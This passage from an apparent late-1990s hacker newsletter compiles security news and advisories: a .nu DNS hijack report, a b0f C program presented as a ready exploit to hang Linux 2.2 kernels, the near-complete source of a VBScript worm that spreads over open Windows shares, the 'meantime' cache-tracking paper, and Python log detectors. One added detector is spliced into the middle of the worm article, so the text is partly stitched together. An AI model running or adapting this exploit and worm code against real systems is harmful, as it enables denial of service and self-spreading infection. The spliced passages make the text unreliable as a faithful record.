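    if low == RDS_DLL:
        # has_msadc() in the script fetches the DLL itself to see if it exists;
        # in the log a 200 means the component is installed, a 404 means it is not.
        return "probe_hit" if status == 200 else "probe_miss"
    if low.startswith(RDS_DLL + "/"):
        handler = low[len(RDS_DLL) + 1:]
        if method == "POST" and handler in RDS_HANDLERS:
            return "query:" + handler
        return "other_handler"
    return None


def scan_iis_log(text: str) -> Dict[str, dict]:
    """Return per-client-IP findings: the RDS events seen, in order, and whether
    the DLL answered the probe."""
    findings: Dict[str, dict] = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        kind = classify(m["method"], m["uri"], int(m["status"]))
        if kind is None:
            continue
        rec = findings.setdefault(m["ip"], {"events": [], "dll_present": None})
        rec["events"].append((m["date"] + " " + m["time"], kind))
        if kind == "probe_hit":
            rec["dll_present"] = True
        elif kind == "probe_miss" and rec["dll_present"] is None:
            rec["dll_present"] = False
    return findings


def verdict(rec: dict) -> str:
    """A POST to a handler is an exploitation attempt; a bare probe is recon."""
    kinds = [k for _, k in rec["events"]]
    if any(k.startswith("query:") for k in kinds):
        return "rds-exploit-attempt"
    if "probe_hit" in kinds:
        return "rds-recon-dll-present"
    return "rds-recon"


if __name__ == "__main__":
    for ip, rec in scan_iis_log(SAMPLE_LOG).items():
        print(ip, verdict(rec), rec["events"])
```

The detector keys on the URI only, so it also catches hand-crafted requests and the v1 three-step sequence; it cannot tell from the log whether the query succeeded, since the script's own success test is the multipart body of the response, which IIS does not log.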
:)

##############################################################################

@HWA

159.0 Hijack any .nu domain box (DoS/redirection/hijack)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Source:http://packetstorm.securify.com/9902-exploits/domain.nu.DoS.txt
Recent Submitted by: Internal

Date: Sat, 20 Feb 1999 21:20:13 -0800
From: Shane Wegner
To: BUGTRAQ@netspace.org
Subject: Possible DOS attack in the .nu domain service

Hello all,

I am not sure if this is known or even relevant to the list and if not,
please excuse this post. There appears to be a bug in the niu DNS setup
process which could result in a DOS attack for those using their domains.
For those unfamiliar with niu, they provide sub-domain service under the
.nu domain to machines which do their own DNS. I have written to them on
several occasions about this issue but as of yet have received no response.

OK, the bug is that any user who is willing to pay the $25 to register a
.nu domain can knock out or redirect a host under another. This is best
shown through an example. I register mycompany.nu and in the registration
form enter the hosts I have doing the DNS for it.

Name: mycompany.nu
DNS1: machine.someserver.com
DNS2: machine2.someserver.com

After this step, my DNS entry in the .nu table looks like this

$ORIGIN nu.
mycompany       IN NS   machine2.someserver.com.
                IN NS   machine2.someserver.com.

mycompany.nu for the sake of this example had the following DNS table.

$ORIGIN nu.
mycompany       IN SOA  mymachine.mycompany.nu. hostmaster.mycompany.nu. (
                        1 301 120 604800 600 )
                IN NS   machine1.someserver.com.
                IN NS   machine2.someserver.com.
$ORIGIN mycompany.nu.
mymachine       IN A    192.168.1.1

So all's well until someone registers evil.nu with the goal of knocking
out myserver.mycompany.nu. On the form, they enter the following.

name: evil.nu
DNS1: mymachine.mycompany.nu
DNS1IP: 127.0.0.1

Now here's the bug: if you enter an IP for a machine which falls under
the .nu name-space, it maps it statically. It does not check to see if it
falls under your name-space. Therefore, our evil.nu entry in the .nu
table looks like this.

$ORIGIN nu.
evil            IN NS   mymachine.mycompany.nu.
$ORIGIN mycompany.nu.
mymachine       IN A    127.0.0.1

So the IP for mymachine.mycompany.nu has been redirected from its
192.168.1.1 to 127.0.0.1. An attacker could conceivably redirect the mail
servers of a company to his own machine or anything to that effect.

Regards,
Shane

--
Shane Wegner: shane@cm.nu
Tel: (604) 930-0530
Sysadmin, Continuum Systems: http://www.cm.nu
Personal website: http://www.cm.nu/~shane
ICQ UIN: 120000
PGP: keyid: 2048/F5C2BD91
Fingerprint: 8C 48 B9 D8 53 BB D8 EF 76 BB DB A2 1C 0D 1D 87

@HWA

160.0 The dreaded and most pheared return of the infamous GOAT!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Submitted by Debris

From the new website:

note: this text has been modified from its original form, it has been
formatted to fit your screen. - Ed

http://www.goat-advisory.org/

January 1998, an EFNET channel was created, #feed-the-goats. From that
emerged a webpage, http://goat.sphix.com. The purpose of that page was to
mock, satirize and piss off the 'underground community'. As we grew in
popularity, people who were NOT members began defacing websites under the
fair name of g0at. Goat security then created a hoax where it was believed
yahoo was cracked. Goat security's popularity skyrocketed after such
incidents. Text files, code and advisories were created daily and the
archive became rather plentiful; however, problems arose which are
described in g0at-quit.txt, leading to the end of g0at. The press release
states that g0at security will never return. Well it is time to annul
that. G0at security has returned. For many months people have been begging
for the return of g0at security. We have finally caved in. We are in the
process of salvaging old text files, images etc...
If you have anything created by us, please visit #feed-the-goats key: blaq,
immediately and speak with Debris.

The 'underground community' has fallen apart. The clueless run amok and
give people with direction, goals, and knowledge a bad name to the general
public. The media has the absolute wrong impression of 'hackers' as you
most likely have heard many rant about before (I will not bore you with
IRC politics/drama). G0at security is back to start up where we left off.
Lightening up the world and spreading joy while pissing most people off.
We are not a defacing group, a ./hacking group or anything else similar to
that. Do not bug us with questions pertaining to this. We want nothing to
do with this other than mocking it.

Coming soon: Various new text files, new members, new webdesign, archive
of salvaged material.

debris@total.net

-=-

http://www.hackernews.com/defaced/1999/yahoo0399/

Original quit text:

///////////////////////////////////////////
 GGGGGG   OOOOOOO   AAAAAAAA  TTTTTTTTTT
G         O     O   A      A      TT
G  GGG    O     O   AAAAAAAA      TT
G     G   O     O   A      A      TT
 GGGGGG   OOOOOOO   A      A      TT
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Due to recent events, the downfall of g0at security has become imminent.
These incidents include:

- Legal problems of some of our members.
- Recent hacking crack downs launched by many governments.
- The recent takeover of our channel, #feed-the-goats (Efnet).
- Losing our server due to a sloppy hack by one of our members
  (/me looks away).
- Losing our text files due to our domain being wiped off the server.
- Fights and disappearances of some of our members.
- The maturing of our members.

g0at security hereby announces its closure. By this we do not mean we are
going legit, we are finished. Unlike other groups we most likely will not
spawn back.

[Brief history of g0at security]

One day in Feb. I believe, ech0 and myself (Debris), decided to irc. ech0
informed me that he occasionally hung out in a channel he, himself,
created called #feed-the-goats. From there, members of a popular group,
HcV, along with members of Global Hell, began coming. ech0 and myself
decided that we wanted to be as elite as our peers in #rootworm, so we
made a webpage. The purpose of the page was to mock and satirize hacker
culture in general. Our first document entitled "g0at declares war on LoU"
mocked the Legion of the Underground's new attempt at becoming legit among
a handful of other aspects of their organization. Our original url
(goat.sphix.com) quickly grew in size and popularity, and our channel
became more populated. The hacks began soon after, some by members and a
lot by non-members. g0at's highpoint came soon after the controversial
yahoo hack. Our popularity skyrocketed and the name g0at became known to
all (unfortunately we got all the l33t0s in our channel and they wouldn't
go away). The fun and games continued up until April, when all the
'incidents' began. Then May was the last straw.

[Where do we go from here]

Most members will most likely go their own ways. Many still hang in
#feed-the-goatz (our new channel). No more text releases will come from
g0at, our webpage will remain down, our archive on attrition.org will stay
the same and nothing will be heard of us as a group.

[Thanks and greets]

Thanks to all that supported our group and enjoyed the text we wrote to
amuse the unintelligent. Greets to all our 12 members, HNN, attrition,
net-security, HWA.hax0r.news. JP, for entertaining us for hours with your
hacker journalism. And thanks to all the rest.

Finally.... it's been fun. It's been awesome being associated with g0at.
You can still reach us at g0at@attrition.org for further questions or
comments or whatever (I just want email)

g0at----------------------------------------------------------------------
[]=Debris=[]
debris@attrition.org

@HWA

161.0 b0f: exploit code to hang any linux machine by eth0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

b0f now has its own section on PSS; only a few files are currently hosted
but we expect the library will be updated in the future.

http://packetstorm.securify.com/advisories/b0f/

/* [http://b0f.morphed.net] - eth0 */
/*                                  */
/*

Vulnerable

Linux 2.2.12
Linux 2.2.13
Linux 2.2.14
Linux 2.3.99-pre2

The following exploit code will hang any Linux machine on various Pentium
platforms. Note that this does not require any special privileges, and any
user can compile and run it, so watch out kiddies...

The send system call immediately puts the kernel in a loop spewing

  kmalloc: Size (131076) too large

forever (or until you hit the reset button). Apparently UNIX domain sockets
are ignoring the /proc/sys/net/core/wmem_max parameter, despite the
documentation to the contrary.

[code provided by eth0 from b0f security]
[information provided by Jay Fenlason]
[http://b0f.morphed.net]
[buffer0verfl0w security]

*/

#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>

char buf[128 * 1024];

int main ( int argc, char **argv )
{
    struct sockaddr SyslogAddr;
    int LogFile;
    int bufsize = sizeof(buf)-5;
    int i;

    /* fill the datagram with printable junk */
    for ( i = 0; i < bufsize; i++ )
        buf[i] = ' '+(i%95);
    buf[i] = '\0';

    /* one ~128K datagram to syslogd's AF_UNIX socket; the affected kernels
       try to kmalloc the whole thing and loop instead of failing the send */
    SyslogAddr.sa_family = AF_UNIX;
    strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data) );
    LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
    sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr) );
    return 0;
}

@HWA

162.0 HNN:Apr 3rd:NIPC Issues Alert on New Self-Propagating 911 Script
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Brian
The National Infrastructure Protection Center has identified a new self
replicating script (hmmm, they don't call it a virus?). The Alert issued
by NIPC says that the new script will erase hard drives and dial 911
emergency systems. The script seems to only affect systems running Windows
that are set up with file and print sharing.

NIPC
ZD Net
Symantec
Network Associates
PC Help
http://www.nipc.gov/nipc/advis00-038.htm
http://www.zdnet.com/zdnn/stories/news/0,4586,2504397,00.html?chkpt
http://www.symantec.com/avcenter/venc/data/bat.chode.worm.html
http://vil.nai.com/vil/wm98557.asp
http://pc-help.org/news/scriptworm.htm

----------

NIPC

(Gotta love their melodramatic all-caps eh? heh -Ed)

SUBJECT: NATIONAL INFRASTRUCTURE PROTECTION CENTER INFORMATION SYSTEM
ADVISORY (NIPC ADVISORY 00-038); SELF-PROPAGATING 911 SCRIPT

1. A RECENT AND BREAKING FBI CASE HAS REVEALED THE CREATION AND
DISSEMINATION OF A SELF-PROPAGATING SCRIPT THAT CAN ERASE HARD DRIVES AND
DIAL-UP 911 EMERGENCY SYSTEMS. WHILE INVESTIGATION AND TECHNICAL ANALYSIS
CONTINUE, THE SCRIPT APPEARS TO INCLUDE THE FOLLOWING CHARACTERISTICS:

A. ACTIVELY SEARCH THE INTERNET FOR COMPUTER SYSTEMS SET UP FOR FILE AND
PRINT SHARING AND COPY ITSELF ON TO THESE SYSTEMS.

B. OVERWRITE VICTIM HARD DRIVES.

C. CAUSE VICTIM SYSTEMS TO DIAL 911 (POSSIBLY CAUSING EMERGENCY
AUTHORITIES TO CHECK OUT SUBSTANTIAL NUMBERS OF "FALSE POSITIVE" CALLS).

2. TO THIS POINT CASE INFORMATION AND KNOWN VICTIMS SUGGEST A RELATIVELY
LIMITED DISSEMINATION OF THIS SCRIPT IN THE HOUSTON, TEXAS AREA, THROUGH
SOURCE COMPUTERS THAT SCANNED SEVERAL THOUSAND COMPUTERS THROUGH FOUR
INTERNET SERVICE PROVIDERS (AMERICA ON-LINE, AT&T, MCI, AND NETZERO).
DISSEMINATED SCRIPT MAY BE PLACED IN HIDDEN DIRECTORIES NAMED CHODE,
FORESKIN OR DICKHAIR. FURTHER SCRIPT ANALYSIS BY THE FBI/NIPC CONTINUES.

3. FBI/NIPC REQUESTS RECIPIENTS IMMEDIATELY REPORT INFORMATION RELATING TO
USE OF THIS SCRIPT TO THE LOCAL FBI OR FBI/NIPC WATCH AT
202-323-3204/3205/3206. AS MORE TECHNICAL OR OPERATIONAL INFORMATION ABOUT
THIS SCRIPT DEVELOPS, NIPC WILL DISSEMINATE THIS INFORMATION THROUGH THE
CARNEGIE MELLON CERT, ANTIVIRUS VENDORS OR ITS OWN WEB SITE (www.nipc.gov),
AS APPROPRIATE.

-=-

pc-help; VBScript Worm Infects Open Shares

Thursday, 24 February 2000

While inspecting a client's misbehaving computer this evening, I found a
little surprise. His StartUp group contained a Visual Basic script which on
inspection proved to be a rather simple, self-replicating and
self-transmitting worm. The client's system had a shared C: drive with no
password, cause unknown. The worm had either been placed on his system (no
evidence so far of a trojan but we've yet to do thorough scans) or it had
arrived by reason of its own action.

How It Works

The script resides in the StartUp group of the Start Menu and is therefore
run at each reboot. The filename is NETWORK.VBS. The script creates a log
file, C:\NETWORK.LOG, which it erases and re-creates upon each new
execution. The script generates a random Class C subnet address and enters
it in the log.
This address is the first three numbers of the usual four-part IP address.
It then steps thru all 255 addresses in that subnet. It blindly attempts
to map a shared C: drive at the remote address to local drive letter J: at
each address in turn. It checks each time to verify the successful creation
of a drive J: on its host. If it has not connected, it repeats the process
at the next address in sequence. When it has stepped thru all 255 addresses
of the current subnet, it creates another random subnet address, enters it
in NETWORK.LOG, and continues attempting connections on the new subnet.

If it succeeds in mapping a remote drive, the script then attempts to copy
itself to a series of likely locations on that drive. Its first act is to
place a copy of itself in the root directory of drive J:. If the file makes
the journey, the script logs its success. Then it copies itself to the
following folders, most of them targeting the StartUp group which will
cause persistent execution of the script at every reboot:

  j:\windows\startm~1\programs\startup\
  j:\windows\
  j:\windows\start menu\programs\startup\
  j:\win95\start menu\programs\startup\
  j:\win95\startm~1\programs\startup\
  j:\wind95\

The script then disconnects, effectively removing drive J:. It then goes
back to work "scanning" addresses without cease. Incidentally, if the host
system has a drive using the letter J: the script will fail to propagate.

Here are the contents of NETWORK.LOG as found on my client's system:

  Log file Open
  Subnet : 211.203.133.0
  Subnet : 203.251.228.0
  Subnet : 201.244.147.0
  Subnet : 204.97.180.0

This particular log reflects the fact that the worm had no success
transferring itself during its last session. The system had been rebooted
about two hours or so before, and had been offline most of that time. The
script had tried only about 1000 addresses in that period. This small
number was presumably because of the delay, usually about 10 seconds,
resulting from a connection attempt to a nonexistent host.

The Script

My analysis is in blue text (reproduced here as ' comment lines - Ed).

Note: A single small alteration of this code renders it impotent. The
remainder has been left intact for the benefit of well-intentioned readers.

dim octa
dim octb
dim octc
dim octd
dim rand
dim dot
dim driveconnected
dim sharename
dim count
dim myfile
' Creates a bunch of variables.
count = "0"
dot = "."
driveconnected="0"
set wshnetwork = wscript.createobject("wscript.network")
Set fso1 = createobject("scripting.filesystemobject")
set fso2 = createobject("scripting.filesystemobject")
' Sets a bunch of variables.
on error resume next
randomize
checkfile()
' Erases and then re-creates its log file, c:\network.log.
randaddress()
' Generates a random Class C subnet address (that's a block of 255 addresses).
checkaddress()
' Increments the IP address by one; and creates a new random subnet if this
' one's been covered.
shareformat()
' Creates a textstring, using the current IP address, which will be used to
' map a shared drive.
wshnetwork.mapnetworkdrive "j:", sharename
' Maps the shared drive to J:, blindly assuming there's one at the address.
enumdrives()
' Checks to see if it's successfully mapped the drive.
copyfiles()
' Places a copy of itself in several places on the drive (someone else's
' machine someplace).
disconnectdrive()
' Drops the connection.
msgbox "Done"

function disconnectdrive()
wshnetwork.removenetworkdrive "j:"
driveconnected = "0"
end function

function createlogfile()
Set myfile = fso1.createtextfile("c:\network.log", True)
end function

function checkfile()
If (fso1.fileexists("c:\network.log")) then
fso1.deletefile("c:\network.log")
createlogfile()
else
createlogfile()
end If
myfile.writeLine("Log file Open")
end function

function copyfiles()
myfile.writeline("Copying files to : " & sharename)
Set fso = CreateObject("scripting.filesystemobject")
fso.copyfile "c:\network.vbs", "j:\"
If (fso2.FileExists("j:\network.vbs")) Then
myfile.writeline("Successfull copy to : " & sharename)
End If
fso.copyfile "c:\network.vbs", "j:\windows\startm~1\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\windows\"
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\win95\start menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\win95\startm~1\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\wind95\"
end function

function checkaddress()
octd = octd + 1
if octd = "255" then randaddress()
end function

function shareformat()
sharename = "\\" & octa & dot & octb & dot & octc & dot & octd & "\C"
end function

function enumdrives()
Set odrives = wshnetwork.enumnetworkdrives
For i = 0 to odrives.Count -1
if sharename = odrives.item(i) then
driveconnected = 1
else
' driveconnected = 0
end if
Next
end function

function randum()
rand = int((254 * rnd) + 1)
end function

function randaddress()
if count > 50 then
octa=Int((16) * Rnd + 199)
count=count + 1
else
octa="255"
end if
randum()
octb=rand
randum()
octc=rand
octd="1"
myfile.writeLine("Subnet : " & octa & dot & octb & dot & octc & dot & "0")
end function

Why did I publish this code?

Comments

This is the first worm I've seen that was targeted to take advantage of
open (sans password) shares. I have no idea whether similar exploits exist
nor whether anyone else has spotted this particular creature.
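Because the script writes every subnet it scans and every share it manages to map into C:\NETWORK.LOG, that file is the best record an incident responder has of where an infected machine spread to. The Python below is an added example, not from pc-help or this issue: it parses a NETWORK.LOG into the subnets scanned, the shares the worm mapped (a mapped share means the remote C: drive was open) and the ones where the copy was confirmed, and it classifies a found network.vbs by location, since the WSH sample in the Windows directory is benign but the StartUp and root copies are not. The sample log is constructed for the example; the message formats and copy locations are the ones in the script's own writeline and copyfile calls.

```python
import re
from typing import Dict, List

# Message formats come straight from the writeline() calls in the script above.
SUBNET_RE = re.compile(r"^Subnet : (\d+\.\d+\.\d+)\.0$")
COPY_RE = re.compile(r"^Copying files to : (\\\\[\d.]+\\C)$")
SUCCESS_RE = re.compile(r"^Successfull copy to : (\\\\[\d.]+\\C)$")

# Constructed sample NETWORK.LOG (not the one from the article): the worm
# mapped two victims' C: shares and confirmed its copy landed on one of them.
SAMPLE_NETWORK_LOG = r"""Log file Open
Subnet : 211.203.133.0
Subnet : 203.251.228.0
Copying files to : \\203.251.228.77\C
Successfull copy to : \\203.251.228.77\C
Subnet : 201.244.147.0
Copying files to : \\201.244.147.12\C
Subnet : 204.97.180.0
"""

# Directories copyfiles() writes into (drive letter stripped, lowercase).
STARTUP_DIRS = (
    "windows\\startm~1\\programs\\startup",
    "windows\\start menu\\programs\\startup",
    "win95\\start menu\\programs\\startup",
    "win95\\startm~1\\programs\\startup",
)
# copyfiles() also drops a copy in \windows\ and \wind95\, which is where the
# harmless WSH sample network.vbs lives, so a file there is not conclusive.
AMBIGUOUS_DIRS = ("windows", "wind95")


def parse_network_log(text: str) -> Dict[str, List[str]]:
    """Return the scanned subnets, the shares that were mapped, and the
    shares where the worm confirmed its own copy."""
    subnets: List[str] = []
    mapped: List[str] = []
    infected: List[str] = []
    for raw in text.splitlines():
        line = raw.rstrip()
        m = SUBNET_RE.match(line)
        if m:
            subnets.append(m.group(1) + ".0/24")
            continue
        m = COPY_RE.match(line)
        if m:
            mapped.append(m.group(1))
            continue
        m = SUCCESS_RE.match(line)
        if m:
            infected.append(m.group(1))
    return {"subnets": subnets, "mapped": mapped, "infected": infected}


def unconfirmed(report: Dict[str, List[str]]) -> List[str]:
    """Shares that were open and written to, but where the root copy was not
    confirmed: still worth checking, since the StartUp copies are attempted
    regardless of whether the root copy succeeded."""
    return [s for s in report["mapped"] if s not in report["infected"]]


def classify_copy(path: str) -> str:
    """Decide what a network.vbs found at `path` most likely is."""
    p = path.lower().replace("/", "\\")
    if not p.endswith("\\network.vbs"):
        return "not-network.vbs"
    rest = p.split(":\\", 1)[1] if ":\\" in p else p.lstrip("\\")
    directory = rest.rsplit("\\", 1)[0] if "\\" in rest else ""
    if directory == "":
        return "worm (root copy)"
    if directory in STARTUP_DIRS:
        return "worm (StartUp persistence)"
    if directory in AMBIGUOUS_DIRS:
        return "ambiguous: compare with the WSH sample, the worm overwrites it"
    return "unexpected location"


if __name__ == "__main__":
    rep = parse_network_log(SAMPLE_NETWORK_LOG)
    print("scanned:", rep["subnets"])
    print("confirmed infected:", rep["infected"])
    print("open but unconfirmed:", unconfirmed(rep))
    for p in (r"C:\network.vbs", r"C:\windows\network.vbs",
              r"C:\windows\startm~1\programs\startup\network.vbs"):
        print(p, "->", classify_copy(p))
```

Remember that the log is rewritten on every boot (checkfile deletes and re-creates it), so only the last session survives; pull the file before rebooting the infected host.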
(25 Feb: I now know that this worm has been known to AV vendors for several
days. Most of them have issued patches for its detection.)

In my opinion, any working copy of this worm is almost certain to replicate
itself on several other machines before it's detected by the user, so it is
probably spreading at a steady -- perhaps even exponential -- rate. It's
impossible to estimate the incidence of open shares with certainty; but
I've poked around looking for them a time or two in an effort to estimate
them; so I think I can hazard an educated guess. I'd say one or two
addresses in a thousand harbor a system with open shares, and a significant
percentage of those will permit access to the entire C: drive. While online
this worm might easily scan several thousand potential victims in the
course of a few hours, which means that an undetected worm residing on a
system that's online several hours a day has a high probability of
replicating itself something like once every day or two.

The capability to run these scripts is installed with Internet Explorer 5.
I'm not sure about IE4. I believe this means that Win98 systems are much
more likely than Win95 machines to have the Windows Script Host installed.
So the script won't run on a significant proportion of the "legacy" systems
which were more easily misconfigured for open shares. This could reduce its
rate of propagation.

25 Feb: UseNet reports indicate that this worm can cause slowdowns on a
LAN. It stands to reason! As reported by NAI at
http://vil.nai.com/vil/vbs98477.asp, the effect of the worm's simultaneous
action on numerous systems on a network may overload or crash servers which
receive a flood of DNS requests resulting from the script's activity.

Note that in systems with Windows Script Host installed, there will be a
file named NETWORK.VBS in the Windows directory. Don't be alarmed. This is
a harmless sample script. If you're infected, the bad guy will be in the
StartUp folder and in the root directory.

Removal

To kill the script, move it out of the StartUp folder and reboot. If
Windows won't allow this, reboot to MS-DOS (don't just open a DOS window)
and type this command:

  ren \windows\startm~1\programs\startup\network.vbs network.txt

Hit Enter. If no error message displays, it worked. Now when you restart
Windows, the script will not run; instead it will open up for examination
in Notepad. If it's not identical to the one I've quoted above, I'd
appreciate it if you'd send me a copy.

In Sum

The worm script does nothing nefarious aside from taking up bandwidth on
the Net link and consuming some processing power on the host system. But it
may have been responsible for some annoying lockups that were observed on
my client's system.

Fortunately it doesn't phone home, nor otherwise serve to advertise the
victim's open shares. But it could easily do so with simple additions. So
it illustrates a rather serious potential for exploit. In fact, given
history, I consider it a positive certainty that more hostile versions of
this thing will appear. A worm like this with phone-home or broadcast
features might spread far and wide, and report on open shares on a huge
scale. It would probably lay a lot of people open to near-certain
intrusion.

It should stand as a grim reminder of the potential seriousness of open
shares. Anyone who simply ensures they're not sharing their entire C: drive
with write permission on the Internet link has nothing to fear from this
worm. If it writes to a shared subdirectory or to another drive, it won't
run. For more on open shares and their solutions, see my page titled File
And Printer Sharing And The Internet.

I am suddenly very interested in this sort of scripting.
If you too would like to investigate it in greater detail, here are some useful links: @HWA 163.0 HNN:Apr 3rd:Mixter Convicted of "Computer Sabotage" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by g.machine() The district court of Hannover Germany has sentenced the creator of Tribe Flood Network, the tool allegedly used in the recent massive DDoS attacks, to 6 six months youth punishment on probation. Mixter was accused of "computer sabotage" and "spying on data". However, the trial had nothing to do with the recent attacks on major internet sites, such as CNN or eBay, Mixter was sentenced due to a felony that happened two years ago. In 1998 he repeatedly broke into several company systems and spied on their data. Heise - German Yahoo News - German http://www.heise.de/newsticker/data/pab-31.03.00-000/ http://de.news.yahoo.com/000331/33/o0fp.html ---------- Freitag März 31, 2:53 PM Jugendstrafe für bekannten Computer-Hacker «Mixter» Hannover (dpa) - Der bekannte Hacker «Mixter» ist in Hannover zu einer Jugendstrafe von sechs Monaten auf Bewährung verurteilt worden. Der 21-Jährige habe mit Computersabotage «beträchtlichen Schaden» angerichtet, heißt es im Urteil. Bekannt wurde «Mixter» nach den jüngsten Hacker-Angriffen auf amerikanische Internet-Firmen. Er hatte das dafür benutzte Programm TFN erstellt. Damit wurden das Internet- Portal Yahoo, der Online-Aktienhändler E*Trade, der Buchhändler Amazon.com und der Nachrichtendienst CNN.com stundenlang lahm gelegt. -=- Babelfishes almost English version: In English: (Well sorta) heh Friday March 31, 2:53 PM Youth punishment for well-known computer hacker " Mixter " Hanover (dpa) - the well-known hacker " Mixter " was condemned in Hanover to a youth punishment by six months on probation. The 21-Jaehrige caused, is called considerable damage " with computer sabotage " it in the judgement. 
Admits became " Mixter " after the recent hacker attacks on American Internet companies. It had prepared the program TFN used for it. Thus the Internet portal Yahoo, the on-line stock broker E*Trade, the bookseller Amazon.com and the intelligence service NCN.com were for hours lamely put.

@HWA

164.0 HNN:Apr 3rd:Forget Cookies, Worry About Cache
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evenprime
Those of us who place a high value on our privacy usually have cookies turned off within our browsers. However, web sites can still track your visits by looking at your cache. Web sites are able to check HTTP cache-control headers such as If-Modified-Since to track individual users.

Linux Care
http://www.linuxcare.com.au/mbp/meantime/

----------

meantime: non-consensual http user tracking using caches

From WordNet (r) 1.6 [wn]:
  mean
    2: characterized by malice; "a hateful thing to do"; "in a mean mood"; "told spiteful stories about the fat lady" [syn: {hateful}, {spiteful}]
    3: having or showing a meanspirited lack of honor or morality;
    4: (slang) excellent; "famous for a mean backhand"
  time
    5: the continuum of experience in which events pass from the future through the present to the past

executive summary

HTTP cache-control headers such as If-Modified-Since allow servers to track individual users in a manner similar to cookies, but with fewer constraints. This is a problem for user privacy against which browsers currently provide little protection.

introduction

Some people would like to be anonymous as they use the web, and other people would like to prevent anonymous access for various reasons. Consider, for example, an internet marketing company that wants to chain together visits to various web sites by a user so as to build a fuller profile of their interests and usage patterns.
Conversely, a web user might not wish to leak such information to a site because they are looking at controversial information, desire a good negotiating position, or see privacy as a moral right. An arms race in techniques for providing and stripping away anonymity has developed over the years. This black paper discusses what is believed to be a new technique for tracking clients and possible responses.

problem statement

Alice is browsing the web; Bob runs a number of otherwise-unrelated web servers. Alice makes several requests to Bob's servers over time. Bob would like to tie together as many as possible of the requests made by Alice to learn more about Alice's usage patterns and identity: we call this identifying the request chain. Alice would like to access Bob's servers but not give away this information.

There are many perfectly good reasons why in a particular situation B might want to know A's identity, or at least a unique pseudonym. If B explains the reasons why tracking is required, then A can consent to and allow tracking in various ways. There are several less savory possibilities when A does not consent to the tracking or does not realize that a single chain can be found across apparently unrelated servers controlled by B.

The scenario poses an interesting information-theory and game-theory challenge in anonymity. It is also immediately practical: there is a good deal of development being done in aid of both Alice and Bob.

existing approaches

cookies

The standard approach for associating user requests across several responses is the HTTP `Cookie' state-management extension. The Cookie response header allows a server to ask the client to store arbitrary short opaque data, which should be returned for future requests of that server matching particular criteria. Cookies are commonly used to store per-user form defaults, to manage web application sessions, and to associate requests between executions of the user agent.
The user agent always has the option to just ignore the Set-Cookie response header, but most implementations default to obeying it to preserve functionality. Cookies can optionally specify an expiry time after which they should no longer be used, that they should persist on disk between client sessions, or that they should only be passed over transmission-level-secure connections.

The privacy implications of cookies have been extensively discussed, and several problems have been found and rectified in the past. One example of privacy compromise through cookies is the use of cookies attached to banner images downloaded from a central banner server: the same cookie is used within images linked from several servers, and so the user can be tracked as they move around.

other approaches

An obvious means to associate requests is by source IP address. Over the short term this will generally work quite well, as a client is likely to use a single IP address during a browsing session. Even then it is complicated by proxies acting for multiple clients, network address translation, or multiuser machines. Over a longer term, the information is convolved by dynamically-assigned IPs, mobile computers moving between networks, dialup pools and the like. Indeed, cookies were proposed in large part to allow legitimate stateful applications to cope with the impossibility of uniquely identifying users by IP address.

Within a single site, state may be maintained by generating dynamic URLs that include session identification either within the hostname (http://d9128309812.crackmonkey.org/) or path (http://crackmonkey.org/d213213213/faq.html). However, this does not allow tracking between sites and causes a significant loss of functionality because URLs cannot be shared between users or bookmarked.

Single links can be identified by the HTTP Referer header.
There are some limitations here, however: this only identifies the immediately preceding resource, and the link is lost if the user re-enters a URL by hand or retrieves it from a bookmarks file.

countermeasures

Users caring to preserve their privacy have taken various countermeasures against these techniques. To reassure end-users about cookie privacy issues, user agents such as Netscape Navigator, Microsoft Internet Explorer and Lynx allow the user some control. The most basic control is to enable or disable cookies altogether; some user agents allow this to be specified for particular domains. There may be more fine-grained controls, such as only accepting cookies from the same server as the top-level page currently viewed and not from servers for subsidiary requests such as images or frames.

The broadest protection is afforded by the use of a proxy local to the browser's machine, such as Internet Junkbuster. This software rewrites the request to strip out identifying browser and cookie information, in addition to attempting to remove advertising banners. Various proxying solutions are available to prevent identification by IP address, such as anonymizer.com and CROWDS.

A similar but more powerful attack is possible through the cache-management headers proposed in draft-mogul-http-delta-02.

caching in http

To make access faster and reduce network usage, browsers generally keep a copy of resources such as pages and images that they download. When a client has a cached copy of a page, it can decide either to use the cached copy as is, or to send a request to the server to check that it is up-to-date. When the client sends a request for the copy it has in cache, it sends a conditional request describing the cached copy and asking the server to only transfer the body of the resource if it is newer than the cached copy. The most common means of checking this currently in use is the Last-Modified date header.
The server supplies a date in the metadata of the response, and the client returns the same date when sending a conditional request. Other techniques, such as checking the length of the resource body, its MD5 hash, and a unique ETag cookie have also been used.

the meantime exploit

The fundament of the meantime exploit is that the server wishes to `tag' the client with some information that will later be reported back, allowing the server to identify a chain. Cookies are a good approach to this, but their privacy implications are well known and so Bob requires a more surreptitious approach. The HTTP cache-control headers are perfect for this: the data is provided by the server, stored but not verified by the client, and then provided verbatim back to the server on the next matching request.

Two headers in particular are useful: Last-Modified and ETag. Both are designed to help the client and server negotiate whether to use a cached copy or fetch the resource again. The general approach of meantime is that rather than using the headers for their intended purpose, Bob's servers will instead send down a unique tag for the client.

